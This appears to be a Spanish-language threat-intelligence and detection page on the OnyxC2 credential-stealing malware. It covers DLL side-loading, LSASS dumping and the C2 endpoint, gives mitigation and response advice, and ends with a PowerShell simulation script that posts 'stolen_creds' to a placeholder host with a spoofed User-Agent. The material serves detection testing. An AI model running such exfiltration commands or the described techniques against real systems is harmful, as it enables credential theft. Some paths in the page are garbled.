Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
OnyxC2 es un nuevo malware-como-servicio diseñado para robar credenciales, extensiones de autenticación de dos factores y billeteras de criptomonedas en aproximadamente 210 aplicaciones. La plataforma ofrece un kit de herramientas completo de estilo comercial, que incluye un panel de gestión, compilador y funcionalidad de acceso remoto. También se basa en métodos de evasión avanzada, incluyendo la carga de DLL lateral con binarios firmados sobredimensionados y componentes de carga útiles cifrados.
Investigación
Los investigadores de BlackFog examinaron múltiples muestras de OnyxC2 y descubrieron un método de carga de DLL lateral que abusa de un ejecutable anfitrión firmado junto con un DLL malicioso de más de 120 MB disfrazado como una biblioteca gráfica de NVIDIA. El análisis de red mostró el malware comunicándose a través de HTTPS con un punto final API de servidor específico. Los investigadores también encontraron superposiciones cifradas incrustadas dentro del DLL, ayudando al malware a evitar el análisis estático directo.
Mitigación
El despliegue de controles de anti-exfiltración de datos en el punto final puede ayudar a bloquear el tráfico saliente no autorizado independientemente del proceso usado. Los equipos de seguridad deben monitorear la carga sospechosa de DLLs asociada con binarios firmados e investigar archivos inusualmente grandes que aparezcan en rutas de escritura por el usuario. También se recomiendan políticas fuertes de control de aplicaciones y monitoreo de tareas programadas no autorizadas.
Respuesta
Si se detecta actividad de OnyxC2, aísle el sistema afectado inmediatamente para detener más robos de datos. Capture un volcado de memoria completo para recuperar la carga útil descifrada y revise en busca de sesiones HVNC activas o actividad de proxy SOCKS5. Revise todas las tareas programadas creadas recientemente e inspeccione los almacenes de credenciales del navegador en busca de evidencia de compromiso.
graph TB %% Definición de clases classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Acceso inicial y ejecución action_user_exec[«<b>Acción</b> – <b idea=’T1204.002’>Ejecución por el Usuario: Archivo Malicioso</b><br/>Descripción: Las víctimas son inducidas a descargar<br/>archivos protegidos con contraseña que contienen<br/>instaladores maliciosos disfrazados de software legítimo.»] class action_user_exec action action_side_loading[«<b idea=’T1574.002’>Secuestro del Flujo de Ejecución: Carga Lateral de DLL</b><br/>Descripción: Utiliza un ejecutable legítimo y firmado digitalmente<br/>para cargar una DLL maliciosa e inflada<br/>llamada borlndmm.dll.»] class action_side_loading action malware_dll[«<b idea=’T1027.001’>Archivos o Información Ofuscados: Relleno Binario</b><br/>Descripción: La DLL se infla a más de 120 MB con<br/>funciones legítimas de gráficos NVIDIA para<br/>evadir los escáneres de seguridad.»] class malware_dll malware %% Persistencia y comando y control action_persistence[«<b idea=’T1547’>Persistencia</b><br/>Descripción: Emplea capacidades opcionales de<br/>ejecución automática mediante tareas programadas.»] class action_persistence action action_c2[«<b idea=’T1071.001’>Comando y Control: Protocolo de Capa de Aplicación</b><br/>Descripción: Comunicación periódica con el backend mediante HTTPS en<br/>/backend/api/app.php, a menudo utilizando Cloudflare<br/>como intermediario para mayor sigilo.»] class action_c2 action %% Descubrimiento y acceso a credenciales action_discovery[«<b idea=’T1217’>Descubrimiento</b><br/>Descripción: Recopila información de navegadores, incluyendo<br/>credenciales guardadas y cookies de 45 navegadores<br/>basados en Chromium y Gecko.»] class action_discovery discovery action_cred_mgr[«<b idea=’T1555.005’>Acceso a Credenciales: Credenciales de Gestores de Contraseñas</b><br/>Descripción: Apunta a 5 aplicaciones diferentes de gestión<br/>de contraseñas para robar credenciales.»] class action_cred_mgr discovery action_lsass[«<b idea=’T1003.001’>Acceso a Credenciales: Volcado de Credenciales del Sistema Operativo</b><br/>Descripción: Extrae la memoria de LSASS para obtener<br/>credenciales.»] class action_lsass discovery %% Exfiltración action_exfil[«<b idea=’T1041’>Exfiltración a través del Canal C2</b><br/>Descripción: Los datos robados, incluidas contraseñas, cookies<br/>e información de monederos, se cargan mediante la<br/>solicitud action=up_d.»] class action_exfil exfiltration %% Flujo de conexiones action_user_exec –>|conduce_a| action_side_loading action_side_loading –>|utiliza| malware_dll malware_dll –>|establece| action_persistence action_persistence –>|inicia| action_c2 action_c2 –>|activa| action_discovery action_discovery –>|conduce_a| action_cred_mgr action_discovery –>|conduce_a| action_lsass action_cred_mgr –>|proporciona_datos_para| action_exfil action_lsass –>|proporciona_datos_para| action_exfil action_exfil –>|se_comunica_mediante| action_c2
Flujo de Ataque
Detecciones
Comando y Control Sospechoso por Solicitud de DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
IOCs (HashSha256) para detectar: Dentro de OnyxC2: El Nuevo Ladrón Apuntando a 210 Aplicaciones
Ver
IOCs (SourceIP) para detectar: Dentro de OnyxC2: El Nuevo Ladrón Apuntando a 210 Aplicaciones
Ver
IOCs (DestinationIP) para detectar: Dentro de OnyxC2: El Nuevo Ladrón Apuntando a 210 Aplicaciones
Ver
Detección de Comunicación OnyxC2 Stealer C2 y Anonimización TOR [Proxy]
Ver
Detección de Autorun de Tarea Programada OnyxC2 y Actividad de Keylogger [Creación de Proceso en Windows]
Ver
Ejecución de Simulación
Prerrequisito: El Check Preliminar de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario busca exfiltrar credenciales robadas del navegador. Para evitar la detección por monitoreo de seguridad de red, despliegan un binario Tor portátil para crear un túnel anonimizado. Una vez que se establece el túnel, el malware inicia una conexión a su servidor de Comando y Control (C2). Para mezclarse con el tráfico web legítimo, el malware falsifica su User-Agent para aparecer como «Cloudflare» y apunta a un punto final de API específico alojado detrás de un proxy de Cloudflare. Esta secuencia está diseñada para activar la correlación de
torargumentos de la línea de comandos y el patrón específico/backend/api/app.phpde la URL. -
Script de Prueba de Regresión:
# Simulación de Comunicación del Ladrón OnyxC2 # 1. Simular la presencia de Tor (Creando un archivo/proceso de comportamiento ficticio) # En un escenario real, este sería el tor.exe real $TorPath = "$env:TEMPtor.exe" "Contenido Binario de Tor Simulado" | Out-File -FilePath $TorPath # Crear un evento de ejecución de proceso para 'tor' vía línea de comandos Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Para asegurar que la lógica de detección 'command_line|contains: tor' se cumpla, # ejecutamos un comando que incluya la cadena 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Simular la Conexión de Red C2 # Usamos PowerShell para simular una conexión de red con la URL específica y el User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Intentando comunicación C2 a $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Comandos de Limpieza:
# Remover artefactos simulados Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Limpieza de simulación completa."